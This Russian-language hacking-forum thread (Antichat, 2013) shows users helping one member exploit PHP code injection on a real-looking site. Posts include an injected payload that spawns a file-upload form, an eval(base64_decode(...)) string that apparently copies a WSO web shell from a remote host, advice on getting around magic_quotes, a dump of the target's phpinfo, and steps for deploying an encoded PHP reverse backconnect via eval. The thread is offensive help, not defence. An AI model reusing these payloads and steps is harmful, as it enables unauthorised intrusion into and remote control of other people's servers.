HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 29.03.2013, 17:10
Evil_Genius
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме:
189651

Репутация: -5
По умолчанию

Цитата:
Сообщение от Hapk  
я когда вот так делаю
site.ru/forum/index.php?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=
у меня нечего не происходит
Тут по идее должна гдето вылезти форма с закачивание файла и кнопкой "Обзор".
 
Ответить с цитированием

  #12  
Старый 29.03.2013, 17:11
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
Провел на форуме:
290351

Репутация: 173


По умолчанию

я видел тут несколько людей с экстрасенсорными способностями, только они оффлайн... phpinfo кинь...
 
Ответить с цитированием

  #13  
Старый 29.03.2013, 17:15
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

скинь директивы пхпинфо сюда

disabled_functions, safe_mode, allow_url_fopen и тп..

проверь папку на вритабельность, запиши сначала шелл в тмп, попробуй инклудить

возможно mq включено, используй stripslashes в бекдоре

2 Охотник

Цитата:
Сообщение от None  
eval(base64_decode (Y29weSgiaHR0cDovL9GB0LDQudGCL3dzby50eHQiLCIyLnBoc CIpOw))%3b ??
string base64_decode ( string $data [, bool $strict = false ] )

ponel?
 
Ответить с цитированием

  #14  
Старый 29.03.2013, 17:15
Hapk
Участник форума
Регистрация: 03.06.2011
Сообщений: 288
Провел на форуме:
70690

Репутация: -5
По умолчанию

Цитата:
Сообщение от Evil_Genius  
Тут по идее должна гдето вылезти форма с закачивание файла и кнопкой "Обзор".
блин просто не увидел форму для загрузки файлов

но когда попробовал залить через неё у меня он походу не залился не фига
 
Ответить с цитированием

  #15  
Старый 29.03.2013, 17:19
Hapk
Участник форума
Регистрация: 03.06.2011
Сообщений: 288
Провел на форуме:
70690

Репутация: -5
По умолчанию

вот небольшой кусок phpinfo

Directive Local Value Master Value

allow_call_time_pass_reference Off Off

allow_url_fopen On On

allow_url_include Off Off

always_populate_raw_post_data Off Off

arg_separator.input & &

arg_separator.output & &

asp_tags Off Off

auto_append_file no value no value

auto_globals_jit On On

auto_prepend_file no value no value

browscap no value no value

default_charset no value no value

default_mimetype text/html text/html

define_syslog_variables Off Off

detect_unicode On On

disable_classes no value no value

disable_functions no value no value

display_errors Off Off

display_startup_errors Off Off

doc_root no value no value

docref_ext no value no value

docref_root no value no value

enable_dl On On

error_append_string no value no value

error_log no value no value

error_prepend_string no value no value

error_reporting 6135 0

expose_php On On

extension_dir /usr/local/lib/php/20060613 /usr/local/lib/php/20060613

file_uploads On On

highlight.bg #FFFFFF #FFFFFF

highlight.comment #FF8000 #FF8000

highlight.default #0000BB #0000BB

highlight.html #000000 #000000

highlight.keyword #007700 #007700

highlight.string #DD0000 #DD0000

html_errors On On

ignore_repeated_errors Off Off

ignore_repeated_source Off Off

ignore_user_abort Off Off

implicit_flush Off Off

include_path .:/usr/local/share/pear .:/usr/local/share/pear

log_errors On On

log_errors_max_len 1024 1024

magic_quotes_gpc On On

magic_quotes_runtime Off Off

magic_quotes_sybase Off Off

mail.force_extra_parameters no value no value

max_execution_time 90 90

max_file_uploads 20 20

max_input_nesting_level 64 64

max_input_time 60 60

memory_limit 192M 192M

open_basedir /home/www/site.ru/public_html/:/var/tmp/:/tmp/ no value

output_buffering 4096 4096

output_handler no value no value

post_max_size 100M 100M

precision 14 14

realpath_cache_size 16K 16K

realpath_cache_ttl 120 120

register_argc_argv Off Off

register_globals Off Off

register_long_arrays Off Off

report_memleaks On On

report_zend_debug On On

safe_mode Off Off

safe_mode_exec_dir no value no value

safe_mode_gid Off Off

safe_mode_include_dir no value no value

sendmail_from no value no value

sendmail_path /usr/sbin/sendmail -t -i /usr/sbin/sendmail -t -i

serialize_precision 100 100

short_open_tag On On

SMTP localhost localhost

smtp_port 25 25

sql.safe_mode Off Off

suhosin.log.phpscript 0 0

suhosin.log.phpscript.is_safe Off Off

suhosin.log.phpscript.name no value no value

suhosin.log.sapi no value no value

suhosin.log.script no value no value

suhosin.log.script.name no value no value

suhosin.log.syslog no value no value

suhosin.log.syslog.facility no value no value

suhosin.log.syslog.priority no value no value

suhosin.log.use-x-forwarded-for Off Off

track_errors Off Off

unserialize_callback_func no value no value

upload_max_filesize 100M 100M

upload_tmp_dir no value no value

user_dir no value no value

variables_order GPCS GPCS

xmlrpc_error_number 0 0

xmlrpc_errors Off Off

y2k_compliance On On

zend.ze1_compatibility_mode Off Off
 
Ответить с цитированием

  #16  
Старый 29.03.2013, 18:53
Hapk
Участник форума
Регистрация: 03.06.2011
Сообщений: 288
Провел на форуме:
70690

Репутация: -5
По умолчанию

Проблема не решена((

Кто ещё чем может помочь?
 
Ответить с цитированием

  #17  
Старый 29.03.2013, 19:35
sova1611
Новичок
Регистрация: 10.01.2009
Сообщений: 0
Провел на форуме:
9138

Репутация: 0
По умолчанию

скорее всего прав не хватает,попробуй в другую диру залится
 
Ответить с цитированием

  #18  
Старый 29.03.2013, 19:48
Hapk
Участник форума
Регистрация: 03.06.2011
Сообщений: 288
Провел на форуме:
70690

Репутация: -5
По умолчанию

Цитата:
Сообщение от sova1611  
скорее всего прав не хватает,попробуй в другую диру залится
много папок перепробовал

но без результатно
 
Ответить с цитированием

  #19  
Старый 29.03.2013, 20:36
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Hapk  
много папок перепробовал
но без результатно
Сдаётся мне что вам попался хорошо настроенный сервер.

Можете радоваться - сорвали ДжекПот ! )

Однако, решение есть - и оно у всех на виду.

1) Шаг первый - ищем бэкконект на php (2кб).

2) Шаг второй - base64encode()

3) Шаг третий - eval(base64decode(backconnect))
 
Ответить с цитированием

  #20  
Старый 29.03.2013, 20:59
Hapk
Участник форума
Регистрация: 03.06.2011
Сообщений: 288
Провел на форуме:
70690

Репутация: -5
По умолчанию

Цитата:
Сообщение от BigBear  
Сдаётся мне что вам попался хорошо настроенный сервер.
Можете радоваться - сорвали ДжекПот ! )
Однако, решение есть - и оно у всех на виду.
1) Шаг первый - ищем бэкконект на php (2кб).
2) Шаг второй - base64encode()
3) Шаг третий - eval(base64decode(backconnect))
Однако я не очень это понял(( в icq ответь

или объясни здесь по подробней
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.